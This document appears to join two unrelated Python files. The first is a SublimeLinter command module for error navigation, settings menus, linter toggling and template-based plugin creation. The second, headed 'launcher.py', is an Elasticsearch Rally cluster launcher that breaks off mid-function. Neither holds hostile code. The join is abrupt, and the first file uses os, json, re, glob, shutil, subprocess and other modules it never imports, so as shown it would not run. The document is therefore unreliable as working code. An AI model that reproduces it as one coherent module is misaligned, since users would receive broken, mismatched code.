from threading import Thread
import time
import sublime
import sublime_plugin
from .lint import highlight, linter, persist, util
def error_command(method):
"""
A decorator that executes method only if the current view has errors.
This decorator is meant to be used only with the run method of
sublime_plugin.TextCommand subclasses.
A wrapped version of method is returned.
"""
def run(self, edit, **kwargs):
vid = self.view.id()
if vid in persist.errors and persist.errors[vid]:
method(self, self.view, persist.errors[vid], persist.highlights[vid], **kwargs)
else:
sublime.message_dialog('No lint errors.')
return run
def select_line(view, line):
"""Change view's selection to be the given line."""
point = view.text_point(line, 0)
sel = view.sel()
sel.clear()
sel.add(view.line(point))
class SublimelinterLintCommand(sublime_plugin.TextCommand):
"""A command that lints the current view if it has a linter."""
def is_enabled(self):
"""
Return True if the current view can be linted.
If the view has *only* file-only linters, it can be linted
only if the view is not dirty.
Otherwise it can be linted.
"""
has_non_file_only_linter = False
vid = self.view.id()
linters = persist.view_linters.get(vid, [])
for lint in linters:
if lint.tempfile_suffix != '-':
has_non_file_only_linter = True
break
if not has_non_file_only_linter:
return not self.view.is_dirty()
return True
def run(self, edit):
"""Lint the current view."""
from .sublimelinter import SublimeLinter
SublimeLinter.shared_plugin().lint(self.view.id())
class HasErrorsCommand:
"""
A mixin class for sublime_plugin.TextCommand subclasses.
Inheriting from this class will enable the command only if the current view has errors.
"""
def is_enabled(self):
"""Return True if the current view has errors."""
vid = self.view.id()
return vid in persist.errors and len(persist.errors[vid]) > 0
class GotoErrorCommand(sublime_plugin.TextCommand):
"""A superclass for commands that go to the next/previous error."""
def goto_error(self, view, errors, direction='next'):
"""Go to the next/previous error in view."""
sel = view.sel()
if len(sel) == 0:
sel.add(sublime.Region(0, 0))
saved_sel = tuple(sel)
empty_selection = len(sel) == 1 and sel[0].empty()
# sublime.Selection() changes the view's selection, get the point first
point = sel[0].begin() if direction == 'next' else sel[-1].end()
regions = sublime.Selection(view.id())
regions.clear()
for error_type in (highlight.WARNING, highlight.ERROR):
regions.add_all(view.get_regions(highlight.MARK_KEY_FORMAT.format(error_type)))
region_to_select = None
# If going forward, find the first region beginning after the point.
# If going backward, find the first region ending before the point.
# If nothing is found in the given direction, wrap to the first/last region.
if direction == 'next':
for region in regions:
if (
(point == region.begin() and empty_selection and not region.empty())
or (point < region.begin())
):
region_to_select = region
break
else:
for region in reversed(regions):
if (
(point == region.end() and empty_selection and not region.empty())
or (point > region.end())
):
region_to_select = region
break
# If there is only one error line and the cursor is in that line, we cannot move.
# Otherwise wrap to the first/last error line unless settings disallow that.
if region_to_select is None and ((len(regions) > 1 or not regions[0].contains(point))):
if persist.settings.get('wrap_find', True):
region_to_select = regions[0] if direction == 'next' else regions[-1]
if region_to_select is not None:
self.select_lint_region(self.view, region_to_select)
else:
sel.clear()
sel.add_all(saved_sel)
sublime.message_dialog('No {0} lint error.'.format(direction))
@classmethod
def select_lint_region(cls, view, region):
"""
Select and scroll to the first marked region that contains region.
If none are found, the beginning of region is used. The view is
centered on the calculated region and the region is selected.
"""
marked_region = cls.find_mark_within(view, region)
if marked_region is None:
marked_region = sublime.Region(region.begin(), region.begin())
sel = view.sel()
sel.clear()
sel.add(marked_region)
# There is a bug in ST3 that prevents the selection from changing
# when a quick panel is open and the viewport does not change position,
# so we call our own custom method that works around that.
util.center_region_in_view(marked_region, view)
@classmethod
def find_mark_within(cls, view, region):
"""Return the nearest marked region that contains region, or None if none found."""
marks = view.get_regions(highlight.MARK_KEY_FORMAT.format(highlight.WARNING))
marks.extend(view.get_regions(highlight.MARK_KEY_FORMAT.format(highlight.ERROR)))
marks.sort(key=sublime.Region.begin)
for mark in marks:
if mark.contains(region):
return mark
return None
class SublimelinterGotoErrorCommand(GotoErrorCommand):
"""A command that selects the next/previous error."""
@error_command
def run(self, view, errors, highlights, **kwargs):
"""Run the command."""
self.goto_error(view, errors, **kwargs)
class SublimelinterShowAllErrors(sublime_plugin.TextCommand):
"""A command that shows a quick panel with all of the errors in the current view."""
@error_command
def run(self, view, errors, highlights):
"""Run the command."""
self.errors = errors
self.highlights = highlights
self.points = []
options = []
for lineno, line_errors in sorted(errors.items()):
if persist.settings.get("passive_warnings", False):
if self.highlights.line_type(lineno) != highlight.ERROR:
continue
line = view.substr(view.full_line(view.text_point(lineno, 0))).rstrip('\n\r')
# Strip whitespace from the front of the line, but keep track of how much was
# stripped so we can adjust the column.
diff = len(line)
line = line.lstrip()
diff -= len(line)
max_prefix_len = 40
for column, message in sorted(line_errors):
# Keep track of the line and column
point = view.text_point(lineno, column)
self.points.append(point)
# If there are more than max_prefix_len characters before the adjusted column,
# lop off the excess and insert an ellipsis.
column = max(column - diff, 0)
if column > max_prefix_len:
visible_line = '...' + line[column - max_prefix_len:]
column = max_prefix_len + 3 # 3 for ...
else:
visible_line = line
# Insert an arrow at the column in the stripped line
code = visible_line[:column] + '➜' + visible_line[column:]
options.append(['{} {}'.format(lineno + 1, message), code])
self.viewport_pos = view.viewport_position()
self.selection = list(view.sel())
view.window().show_quick_panel(
options,
on_select=self.select_error,
on_highlight=self.select_error
)
def select_error(self, index):
"""Completion handler for the quick panel. Selects the indexed error."""
if index != -1:
point = self.points[index]
GotoErrorCommand.select_lint_region(self.view, sublime.Region(point, point))
else:
self.view.set_viewport_position(self.viewport_pos)
self.view.sel().clear()
self.view.sel().add_all(self.selection)
class SublimelinterToggleSettingCommand(sublime_plugin.WindowCommand):
"""Command that toggles a setting."""
def __init__(self, window):
"""Initialize a new instance."""
super().__init__(window)
def is_visible(self, **args):
"""Return True if the opposite of the setting is True."""
if args.get('checked', False):
return True
if persist.settings.has_setting(args['setting']):
setting = persist.settings.get(args['setting'], None)
return setting is not None and setting is not args['value']
else:
return args['value'] is not None
def is_checked(self, **args):
"""Return True if the setting should be checked."""
if args.get('checked', False):
setting = persist.settings.get(args['setting'], False)
return setting is True
else:
return False
def run(self, **args):
"""Toggle the setting if value is boolean, or remove it if None."""
if 'value' in args:
if args['value'] is None:
persist.settings.pop(args['setting'])
else:
persist.settings.set(args['setting'], args['value'], changed=True)
else:
setting = persist.settings.get(args['setting'], False)
persist.settings.set(args['setting'], not setting, changed=True)
persist.settings.save()
class ChooseSettingCommand(sublime_plugin.WindowCommand):
"""An abstract base class for commands that choose a setting from a list."""
def __init__(self, window, setting=None, preview=False):
"""Initialize a new instance."""
super().__init__(window)
self.setting = setting
self._settings = None
self.preview = preview
def description(self, **args):
"""Return the visible description of the command, used in menus."""
return args.get('value', None)
def is_checked(self, **args):
"""Return whether this command should be checked in a menu."""
if 'value' not in args:
return False
item = self.transform_setting(args['value'], matching=True)
setting = self.setting_value(matching=True)
return item == setting
def _get_settings(self):
"""Return the list of settings."""
if self._settings is None:
self._settings = self.get_settings()
return self._settings
settings = property(_get_settings)
def get_settings(self):
"""Return the list of settings. Subclasses must override this."""
raise NotImplementedError
def transform_setting(self, setting, matching=False):
"""
Transform the display text for setting to the form it is stored in.
By default, returns a lowercased copy of setting.
"""
return setting.lower()
def setting_value(self, matching=False):
"""Return the current value of the setting."""
return self.transform_setting(persist.settings.get(self.setting, ''), matching=matching)
def on_highlight(self, index):
"""If preview is on, set the selected setting."""
if self.preview:
self.set(index)
def choose(self, **kwargs):
"""
Choose or set the setting.
If 'value' is in kwargs, the setting is set to the corresponding value.
Otherwise the list of available settings is built via get_settings
and is displayed in a quick panel. The current value of the setting
is initially selected in the quick panel.
"""
if 'value' in kwargs:
setting = self.transform_setting(kwargs['value'])
else:
setting = self.setting_value(matching=True)
index = 0
for i, s in enumerate(self.settings):
if isinstance(s, (tuple, list)):
s = self.transform_setting(s[0])
else:
s = self.transform_setting(s)
if s == setting:
index = i
break
if 'value' in kwargs:
self.set(index)
else:
self.previous_setting = self.setting_value()
self.window.show_quick_panel(
self.settings,
on_select=self.set,
selected_index=index,
on_highlight=self.on_highlight)
def set(self, index):
"""Set the value of the setting."""
if index == -1:
if self.settings_differ(self.previous_setting, self.setting_value()):
self.update_setting(self.previous_setting)
return
setting = self.selected_setting(index)
if isinstance(setting, (tuple, list)):
setting = setting[0]
setting = self.transform_setting(setting)
if not self.settings_differ(persist.settings.get(self.setting, ''), setting):
return
self.update_setting(setting)
def update_setting(self, value):
"""Update the setting with the given value."""
persist.settings.set(self.setting, value, changed=True)
self.setting_was_changed(value)
persist.settings.save()
def settings_differ(self, old_setting, new_setting):
"""Return whether two setting values differ."""
if isinstance(new_setting, (tuple, list)):
new_setting = new_setting[0]
new_setting = self.transform_setting(new_setting)
return new_setting != old_setting
def selected_setting(self, index):
"""
Return the selected setting by index.
Subclasses may override this if they want to return something other
than the indexed value from self.settings.
"""
return self.settings[index]
def setting_was_changed(self, setting):
"""
Do something after the setting value is changed but before settings are saved.
Subclasses may override this if further action is necessary after
the setting's value is changed.
"""
pass
def choose_setting_command(setting, preview):
"""Return a decorator that provides common methods for concrete subclasses of ChooseSettingCommand."""
def decorator(cls):
def init(self, window):
super(cls, self).__init__(window, setting, preview)
def run(self, **kwargs):
"""Run the command."""
self.choose(**kwargs)
cls.setting = setting
cls.__init__ = init
cls.run = run
return cls
return decorator
@choose_setting_command('lint_mode', preview=False)
class SublimelinterChooseLintModeCommand(ChooseSettingCommand):
"""A command that selects a lint mode from a list."""
def get_settings(self):
"""Return a list of the lint modes."""
return [[name.capitalize(), description] for name, description in persist.LINT_MODES]
def setting_was_changed(self, setting):
"""Update all views when the lint mode changes."""
if setting == 'background':
from .sublimelinter import SublimeLinter
SublimeLinter.lint_all_views()
else:
linter.Linter.clear_all()
@choose_setting_command('mark_style', preview=True)
class SublimelinterChooseMarkStyleCommand(ChooseSettingCommand):
"""A command that selects a mark style from a list."""
def get_settings(self):
"""Return a list of the mark styles."""
return highlight.mark_style_names()
@choose_setting_command('gutter_theme', preview=True)
class SublimelinterChooseGutterThemeCommand(ChooseSettingCommand):
"""A command that selects a gutter theme from a list."""
def get_settings(self):
"""
Return a list of all available gutter themes, with 'None' at the end.
Whether the theme is colorized and is a SublimeLinter or user theme
is indicated below the theme name.
"""
settings = self.find_gutter_themes()
settings.append(['None', 'Do not display gutter marks'])
self.themes.append('none')
return settings
def find_gutter_themes(self):
"""
Find all SublimeLinter.gutter-theme resources.
For each found resource, if it doesn't match one of the patterns
from the "gutter_theme_excludes" setting, return the base name
of resource and info on whether the theme is a standard theme
or a user theme, as well as whether it is colorized.
The list of paths to the resources is appended to self.themes.
"""
self.themes = []
settings = []
gutter_themes = sublime.find_resources('*.gutter-theme')
excludes = persist.settings.get('gutter_theme_excludes', [])
pngs = sublime.find_resources('*.png')
for theme in gutter_themes:
# Make sure the theme has error.png and warning.png
exclude = False
parent = os.path.dirname(theme)
for name in ('error', 'warning'):
if '{}/{}.png'.format(parent, name) not in pngs:
exclude = True
if exclude:
continue
# Now see if the theme name is in gutter_theme_excludes
name = os.path.splitext(os.path.basename(theme))[0]
for pattern in excludes:
if fnmatch(name, pattern):
exclude = True
break
if exclude:
continue
self.themes.append(theme)
try:
info = json.loads(sublime.load_resource(theme))
colorize = info.get('colorize', False)
except ValueError:
colorize = False
std_theme = theme.startswith('Packages/SublimeLinter/gutter-themes/')
settings.append([
name,
'{}{}'.format(
'SublimeLinter theme' if std_theme else 'User theme',
' (colorized)' if colorize else ''
)
])
# Sort self.themes and settings in parallel using the zip trick
settings, self.themes = zip(*sorted(zip(settings, self.themes)))
# zip returns tuples, convert back to lists
settings = list(settings)
self.themes = list(self.themes)
return settings
def selected_setting(self, index):
"""Return the theme name with the given index."""
return self.themes[index]
def transform_setting(self, setting, matching=False):
"""
Return a transformed version of setting.
For gutter themes, setting is a Packages-relative path
to a .gutter-theme file.
If matching == False, return the original setting text,
gutter theme settings are not lowercased.
If matching == True, return the base name of the filename
without the .gutter-theme extension.
"""
if matching:
return os.path.splitext(os.path.basename(setting))[0]
else:
return setting
class SublimelinterToggleLinterCommand(sublime_plugin.WindowCommand):
"""A command that toggles, enables, or disables linter plugins."""
def __init__(self, window):
"""Initialize a new instance."""
super().__init__(window)
self.linters = {}
def is_visible(self, **args):
"""Return True if the command would show any linters."""
which = args['which']
if self.linters.get(which) is None:
linters = []
settings = persist.settings.get('linters', {})
for instance in persist.linter_classes:
linter_settings = settings.get(instance, {})
disabled = linter_settings.get('@disable')
if which == 'all':
include = True
instance = [instance, 'disabled' if disabled else 'enabled']
else:
include = (
which == 'enabled' and not disabled or
which == 'disabled' and disabled
)
if include:
linters.append(instance)
linters.sort()
self.linters[which] = linters
return len(self.linters[which]) > 0
def run(self, **args):
"""Run the command."""
self.which = args['which']
if self.linters[self.which]:
self.window.show_quick_panel(self.linters[self.which], self.on_done)
def on_done(self, index):
"""Completion handler for quick panel, toggle the enabled state of the chosen linter."""
if index != -1:
linter = self.linters[self.which][index]
if isinstance(linter, list):
linter = linter[0]
settings = persist.settings.get('linters', {})
linter_settings = settings.get(linter, {})
linter_settings['@disable'] = not linter_settings.get('@disable', False)
persist.settings.set('linters', settings, changed=True)
persist.settings.save()
self.linters = {}
class SublimelinterCreateLinterPluginCommand(sublime_plugin.WindowCommand):
"""A command that creates a new linter plugin."""
def run(self):
"""Run the command."""
if not sublime.ok_cancel_dialog(
'You will be asked for the linter name. Please enter the name '
'of the linter binary (including dashes), NOT the name of the language being linted. '
'For example, to lint CSS with csslint, the linter name is '
'“csslint”, NOT “css”.',
'I understand'
):
return
self.window.show_input_panel(
'Linter name:',
'',
on_done=self.copy_linter,
on_change=None,
on_cancel=None)
def copy_linter(self, name):
"""Copy the template linter to a new linter with the given name."""
self.name = name
self.fullname = 'SublimeLinter-contrib-{}'.format(name)
self.dest = os.path.join(sublime.packages_path(), self.fullname)
if os.path.exists(self.dest):
sublime.error_message('The plugin “{}” already exists.'.format(self.fullname))
return
src = os.path.join(sublime.packages_path(), persist.PLUGIN_DIRECTORY, 'linter-plugin-template')
self.temp_dir = None
try:
self.temp_dir = tempfile.mkdtemp()
self.temp_dest = os.path.join(self.temp_dir, self.fullname)
shutil.copytree(src, self.temp_dest)
self.get_linter_language(name, self.configure_linter)
except Exception as ex:
if self.temp_dir and os.path.exists(self.temp_dir):
shutil.rmtree(self.temp_dir)
sublime.error_message('An error occurred while copying the template plugin: {}'.format(str(ex)))
def configure_linter(self, language):
"""Fill out the template and move the linter into Packages."""
try:
if language is None:
return
if not self.fill_template(self.temp_dir, self.name, self.fullname, language):
return
git = util.which('git')
if git:
subprocess.call((git, 'init', self.temp_dest))
shutil.move(self.temp_dest, self.dest)
util.open_directory(self.dest)
self.wait_for_open(self.dest)
except Exception as ex:
sublime.error_message('An error occurred while configuring the plugin: {}'.format(str(ex)))
finally:
if self.temp_dir and os.path.exists(self.temp_dir):
shutil.rmtree(self.temp_dir)
def get_linter_language(self, name, callback):
"""Get the language (python, node, etc.) on which the linter is based."""
languages = ['javascript', 'python', 'ruby', 'other']
items = ['Select the language on which the linter is based:']
for language in languages:
items.append(' ' + language.capitalize())
def on_done(index):
language = languages[index - 1] if index > 0 else None
callback(language)
self.window.show_quick_panel(items, on_done)
def fill_template(self, template_dir, name, fullname, language):
"""Replace placeholders and fill template files in template_dir, return success."""
# Read per-language info
path = os.path.join(os.path.dirname(__file__), 'create_linter_info.json')
with open(path, mode='r', encoding='utf-8') as f:
try:
info = json.load(f)
except Exception as err:
persist.printf(err)
sublime.error_message('A configuration file could not be opened, the linter cannot be created.')
return False
info = info.get(language, {})
extra_attributes = []
comment_re = info.get('comment_re', 'None')
extra_attributes.append('comment_re = ' + comment_re)
attributes = info.get('attributes', [])
for attr in attributes:
extra_attributes.append(attr.format(name))
extra_attributes = '\n '.join(extra_attributes)
if extra_attributes:
extra_attributes += '\n'
extra_steps = info.get('extra_steps', '')
if isinstance(extra_steps, list):
extra_steps = '\n\n'.join(extra_steps)
if extra_steps:
extra_steps = '\n' + extra_steps + '\n'
platform = info.get('platform', language.capitalize())
# Replace placeholders
placeholders = {
'__linter__': name,
'__user__': util.get_user_fullname(),
'__year__': str(datetime.date.today().year),
'__class__': self.camel_case(name),
'__superclass__': info.get('superclass', 'Linter'),
'__cmd__': '{}@python'.format(name) if language == 'python' else name,
'__extra_attributes__': extra_attributes,
'__platform__': platform,
'__install__': info['installer'].format(name),
'__extra_install_steps__': extra_steps
}
for root, dirs, files in os.walk(template_dir):
for filename in files:
extension = os.path.splitext(filename)[1]
if extension in ('.py', '.md', '.txt'):
path = os.path.join(root, filename)
with open(path, encoding='utf-8') as f:
text = f.read()
for placeholder, value in placeholders.items():
text = text.replace(placeholder, value)
with open(path, mode='w', encoding='utf-8') as f:
f.write(text)
return True
def camel_case(self, name):
"""Convert and return a name in the form foo-bar to FooBar."""
camel_name = name[0].capitalize()
i = 1
while i < len(name):
if name[i] == '-' and i < len(name) - 1:
camel_name += name[i + 1].capitalize()
i += 1
else:
camel_name += name[i]
i += 1
return camel_name
def wait_for_open(self, dest):
"""Wait for new linter window to open in another thread."""
def open_linter_py():
"""Wait until the new linter window has opened and open linter.py."""
start = datetime.datetime.now()
while True:
time.sleep(0.25)
delta = datetime.datetime.now() - start
# Wait a maximum of 5 seconds
if delta.seconds > 5:
break
window = sublime.active_window()
folders = window.folders()
if folders and folders[0] == dest:
window.open_file(os.path.join(dest, 'linter.py'))
break
sublime.set_timeout_async(open_linter_py, 0)
class SublimelinterPackageControlCommand(sublime_plugin.WindowCommand):
"""
Abstract superclass for Package Control utility commands.
Only works if git is installed.
"""
TAG_RE = re.compile(r'(?P<major>\d+)\.(?P<minor>\d+)\.(?P<release>\d+)(?:\+\d+)?')
def __init__(self, window):
"""Initialize a new instance."""
super().__init__(window)
self.git = ''
def is_visible(self, paths=[]):
"""Return True if any eligible plugin directories are selected."""
if self.git == '':
self.git = util.which('git')
if self.git:
for path in paths:
if self.is_eligible_path(path):
return True
return False
def is_eligible_path(self, path):
"""
Return True if path is an eligible directory.
A directory is eligible if it has a messages subdirectory
and has messages.json.
"""
return (
os.path.isdir(path) and
os.path.isdir(os.path.join(path, 'messages')) and
os.path.isfile(os.path.join(path, 'messages.json'))
)
def get_current_tag(self):
"""
Return the most recent tag components.
A tuple of (major, minor, release) is returned, or (1, 0, 0) if there are no tags.
If the most recent tag does not conform to semver, return (None, None, None).
"""
tag = util.communicate(['git', 'describe', '--tags', '--abbrev=0']).strip()
if not tag:
return (1, 0, 0)
match = self.TAG_RE.match(tag)
if match:
return (int(match.group('major')), int(match.group('minor')), int(match.group('release')))
else:
return None
class SublimelinterNewPackageControlMessageCommand(SublimelinterPackageControlCommand):
"""
This command automates the process of creating new Package Control release messages.
It creates a new entry in messages.json for the next version
and creates a new file named messages/<version>.txt.
"""
COMMIT_MSG_RE = re.compile(r'{{{{(.+?)}}}}')
def __init__(self, window):
"""Initialize a new instance."""
super().__init__(window)
def run(self, paths=[]):
"""Run the command."""
for path in paths:
if self.is_eligible_path(path):
self.make_new_version_message(path)
def make_new_version_message(self, path):
"""Make a new version message for the repo at the given path."""
try:
cwd = os.getcwd()
os.chdir(path)
version = self.get_current_tag()
if version[0] is None:
return
messages_path = os.path.join(path, 'messages.json')
message_path = self.rewrite_messages_json(messages_path, version)
if os.path.exists(message_path):
os.remove(message_path)
with open(message_path, mode='w', encoding='utf-8') as f:
header = '{} {}'.format(
os.path.basename(path),
os.path.splitext(os.path.basename(message_path))[0])
f.write('{}\n{}\n'.format(header, '-' * (len(header) + 1)))
f.write(self.get_commit_messages_since(version))
self.window.run_command('open_file', args={'file': message_path})
except Exception:
import traceback
traceback.print_exc()
finally:
os.chdir(cwd)
def rewrite_messages_json(self, messages_path, tag):
"""Add an entry in messages.json for tag, return relative path to the file."""
with open(messages_path, encoding='utf-8') as f:
messages = json.load(f)
major, minor, release = tag
release += 1
tag = '{}.{}.{}'.format(major, minor, release)
message_path = os.path.join('messages', '{}.txt'.format(tag))
messages[tag] = message_path
message_path = os.path.join(os.path.dirname(messages_path), message_path)
with open(messages_path, mode='w', encoding='utf-8') as f:
messages_json = '{\n'
sorted_messages = []
if 'install' in messages:
install_message = messages.pop('install')
sorted_messages.append(' "install": "{}"'.format(install_message))
keys = sorted(map(self.sortable_tag, messages.keys()))
for _, key in keys:
sorted_messages.append(' "{}": "{}"'.format(key, messages[key]))
messages_json += ',\n'.join(sorted_messages)
messages_json += '\n}\n'
f.write(messages_json)
return message_path
def sortable_tag(self, tag):
"""Return a version tag in a sortable form."""
if tag == 'install':
return (tag, tag)
major, minor, release = tag.split('.')
if '+' in release:
release, update = release.split('+')
update = '+{:04}'.format(int(update))
else:
update = ''
return ('{:04}.{:04}.{:04}{}'.format(int(major), int(minor), int(release), update), tag)
def get_commit_messages_since(self, version):
"""Return a formatted list of commit messages since the given tagged version."""
tag = '{}.{}.{}'.format(*version)
output = util.communicate([
'git', 'log',
'--pretty=format:{{{{%w(0,0,0)%s %b}}}}',
'--reverse', tag + '..'
])
# Split the messages, they are bounded by {{{{ }}}}
messages = []
for match in self.COMMIT_MSG_RE.finditer(output):
messages.append(match.group(1).strip())
# Wrap the messages
wrapper = TextWrapper(initial_indent='- ', subsequent_indent=' ')
messages = list(map(lambda msg: '\n'.join(wrapper.wrap(msg)), messages))
return '\n\n'.join(messages) + '\n'
class SublimelinterClearColorSchemeFolderCommand(sublime_plugin.WindowCommand):
"""A command that clears all of SublimeLinter made color schemes."""
def run(self):
"""Run the command."""
base_path = os.path.join(sublime.packages_path(), 'User', '*.tmTheme')
sublime_path = os.path.join(sublime.packages_path(), 'User', 'SublimeLinter', '*.tmTheme')
themes = glob(base_path) + glob(sublime_path)
prefs = sublime.load_settings('Preferences.sublime-settings')
scheme = prefs.get('color_scheme')
for theme in themes:
# Ensure it is a (SL) theme and it is not current current scheme
if re.search(r'\(SL\)', theme) and os.path.normpath(scheme) not in theme:
persist.debug('deleting {}'.format(os.path.split(theme)[1]))
os.remove(theme)
class SublimelinterClearCachesCommand(sublime_plugin.WindowCommand):
"""A command that clears all of SublimeLinter's internal caches."""
def run(self):
"""Run the command."""
util.clear_path_caches()
util.get_rc_settings.cache_clear()
util.find_file.cache_clear()
linter.Linter.clear_settings_caches()
class SublimelinterReportCommand(sublime_plugin.WindowCommand):
"""
A command that displays a report of all errors.
The scope of the report is all open files in the current window,
all files in all folders in the current window, or both.
"""
def run(self, on='files'):
"""Run the command. on determines the scope of the report."""
output = self.window.new_file()
output.set_name('{} Error Report'.format(persist.PLUGIN_NAME))
output.set_scratch(True)
from .sublimelinter import SublimeLinter
self.plugin = SublimeLinter.shared_plugin()
if on == 'files' or on == 'both':
for view in self.window.views():
self.report(output, view)
if on == 'folders' or on == 'both':
for folder in self.window.folders():
self.folder(output, folder)
def folder(self, output, folder):
"""Report on all files in a folder."""
for root, dirs, files in os.walk(folder):
for name in files:
path = os.path.join(root, name)
# Ignore files over 256K to speed things up a bit
if os.stat(path).st_size < 256 * 1024:
# TODO: not implemented
pass
def report(self, output, view):
"""Write a report on the given view to output."""
def finish_lint(view, linters, hit_time):
if not linters:
return
def insert(edit):
if not any(l.errors for l in linters):
return
filename = os.path.basename(linters[0].filename or 'untitled')
out = '\n{}:\n'.format(filename)
for lint in sorted(linters, key=lambda lint: lint.name):
if lint.errors:
out += '\n {}:\n'.format(lint.name)
items = sorted(lint.errors.items())
# Get the highest line number so we know how much padding numbers need
highest_line = items[-1][0]
width = 1
while highest_line >= 10:
highest_line /= 10
width += 1
for line, messages in items:
for col, message in messages:
out += ' {:>{width}}: {}\n'.format(line + 1, message, width=width)
output.insert(edit, output.size(), out)
persist.edits[output.id()].append(insert)
output.run_command('sublimelinter_edit')
kwargs = {'self': self.plugin, 'view_id': view.id(), 'callback': finish_lint}
from .sublimelinter import SublimeLinter
Thread(target=SublimeLinter.lint, kwargs=kwargs).start()
|
launcher.py
|
# Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import os
import signal
import subprocess
import threading
import shlex
from esrally import config, time, exceptions, client
from esrally.mechanic import telemetry, cluster, java_resolver
from esrally.utils import process, jvm
def wait_for_rest_layer(es, max_attempts=20):
for attempt in range(max_attempts):
import elasticsearch
try:
es.info()
return True
except elasticsearch.TransportError as e:
if e.status_code == 503 or isinstance(e, elasticsearch.ConnectionError):
time.sleep(1)
elif e.status_code == 401:
time.sleep(1)
else:
raise e
return False
class ClusterLauncher:
"""
The cluster launcher performs cluster-wide tasks that need to be done in the startup / shutdown phase.
"""
def __init__(self, cfg, metrics_store, client_factory_class=client.EsClientFactory):
"""
Creates a new ClusterLauncher.
:param cfg: The config object.
:param metrics_store: A metrics store that is configured to receive system metrics.
:param client_factory_class: A factory class that can create an Elasticsearch client.
"""
self.cfg = cfg
self.metrics_store = metrics_store
self.client_factory = client_factory_class
self.logger = logging.getLogger(__name__)
def start(self):
"""
Performs final startup tasks.
Precondition: All cluster nodes have been started.
Postcondition: The cluster is ready to receive HTTP requests or a ``LaunchError`` is raised.
:return: A representation of the launched cluster.
"""
enabled_devices = self.cfg.opts("mechanic", "telemetry.devices")
telemetry_params = self.cfg.opts("mechanic", "telemetry.params")
all_hosts = self.cfg.opts("client", "hosts").all_hosts
default_hosts = self.cfg.opts("client", "hosts").default
preserve = self.cfg.opts("mechanic", "preserve.install")
es = {}
for cluster_name, cluster_hosts in all_hosts.items():
all_client_options = self.cfg.opts("client", "options").all_client_options
cluster_client_options = dict(all_client_options[cluster_name])
# Use retries to avoid aborts on long living connections for telemetry devices
cluster_client_options["retry-on-timeout"] = True
es[cluster_name] = self.client_factory(cluster_hosts, cluster_client_options).create()
es_default = es["default"]
t = telemetry.Telemetry(enabled_devices, devices=[
telemetry.NodeStats(telemetry_params, es, self.metrics_store),
telemetry.ClusterMetaDataInfo(es_default),
telemetry.ClusterEnvironmentInfo(es_default, self.metrics_store),
telemetry.JvmStatsSummary(es_default, self.metrics_store),
telemetry.IndexStats(es_default, self.metrics_store),
telemetry.MlBucketProcessingTime(es_default, self.metrics_store),
telemetry.CcrStats(telemetry_params, es, self.metrics_store),
telemetry.RecoveryStats(telemetry_params, es, self.metrics_store)
])
# The list of nodes will be populated by ClusterMetaDataInfo, so no need to do it here
c = cluster.Cluster(default_hosts, [], t, preserve)
self.logger.info("All cluster nodes have successfully started. Checking if REST API is available.")
if wait_for_rest_layer(es_default, max_attempts=40):
self.logger.info("REST API is available. Attaching telemetry devices to cluster.")
t.attach_to_cluster(c)
self.logger.info("Telemetry devices are now attached to the cluster.")
else:
# Just stop the cluster here and raise. The caller is responsible for terminating individual nodes.
self.logger.error("REST API layer is not yet available. Forcefully terminating cluster.")
self.stop(c)
raise exceptions.LaunchError("Elasticsearch REST API layer is not available. Forcefully terminated cluster.")
return c
def stop(self, c):
"""
Performs cleanup tasks. This method should be called before nodes are shut down.
:param c: The cluster that is about to be stopped.
"""
c.telemetry.detach_from_cluster(c)
class StartupWatcher:
def __init__(self, node_name, server, startup_event):
self.node_name = node_name
self.server = server
self.startup_event = startup_event
self.logger = logging.getLogger(__name__)
def watch(self):
"""
Reads the output from the ES (node) subprocess.
"""
lines_to_log = 0
while True:
line = self.server.stdout.readline().decode("utf-8")
if len(line) == 0:
self.logger.info("%s (stdout): No more output. Process has likely terminated.", self.node_name)
self.await_termination(self.server)
self.startup_event.set()
break
line = line.rstrip()
# if an error occurs, log the next few lines
if "error" in line.lower():
lines_to_log = 10
# don't log each output line as it is contained in the node's log files anyway and we just risk spamming our own log.
if not self.startup_event.isSet() or lines_to_log > 0:
self.logger.info("%s (stdout): %s", self.node_name, line)
lines_to_log -= 1
# no need to check as soon as we have detected node startup
if not self.startup_event.isSet():
if line.find("Initialization Failed") != -1 or line.find("A fatal exception has occurred") != -1:
self.logger.error("[%s] encountered initialization errors.", self.node_name)
# wait a moment to ensure the process has terminated before we signal that we detected a (failed) startup.
self.await_termination(self.server)
self.startup_event.set()
if line.endswith("started") and not self.startup_event.isSet():
self.startup_event.set()
self.logger.info("[%s] has successfully started.", self.node_name)
def await_termination(self, server, timeout=5):
# wait a moment to ensure the process has terminated
wait = timeout
while not server.returncode or wait == 0:
time.sleep(0.1)
server.poll()
wait -= 1
def _start(process, node_name):
log = logging.getLogger(__name__)
startup_event = threading.Event()
watcher = StartupWatcher(node_name, process, startup_event)
t = threading.Thread(target=watcher.watch)
t.setDaemon(True)
t.start()
if startup_event.wait(timeout=InProcessLauncher.PROCESS_WAIT_TIMEOUT_SECONDS):
process.poll()
# has the process terminated?
if process.returncode:
msg = "Node [%s] has terminated with exit code [%s]." % (node_name, str(process.returncode))
log.error(msg)
raise exceptions.LaunchError(msg)
else:
log.info("Started node [%s] with PID [%s].", node_name, process.pid)
return process
else:
msg = "Could not start node [%s] within timeout period of [%s] seconds." % (
node_name, InProcessLauncher.PROCESS_WAIT_TIMEOUT_SECONDS)
# check if the process has terminated already
process.poll()
if process.returncode:
msg += " The process has already terminated with exit code [%s]." % str(process.returncode)
else:
msg += " The process seems to be still running with PID [%s]." % process.pid
log.error(msg)
raise exceptions.LaunchError(msg)
class DockerLauncher:
# May download a Docker image and that can take some time
PROCESS_WAIT_TIMEOUT_SECONDS = 10 * 60
def __init__(self, cfg, metrics_store):
self.cfg = cfg
self.metrics_store = metrics_store
self.binary_paths = {}
self.node_name = None
self.keep_running = self.cfg.opts("mechanic", "keep.running")
self.logger = logging.getLogger(__name__)
def start(self, node_configurations):
nodes = []
for node_configuration in node_configurations:
node_name = node_configuration.node_name
host_name = node_configuration.ip
